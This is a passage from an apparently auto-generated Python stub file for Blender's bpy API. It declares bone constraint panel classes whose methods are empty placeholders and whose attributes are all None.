def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bObjectSolverConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bPivotConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bPythonConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bRotLimitConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bRotateLikeConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bSameVolumeConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bShrinkwrapConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bSizeLikeConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bSizeLimitConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bSplineIKConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
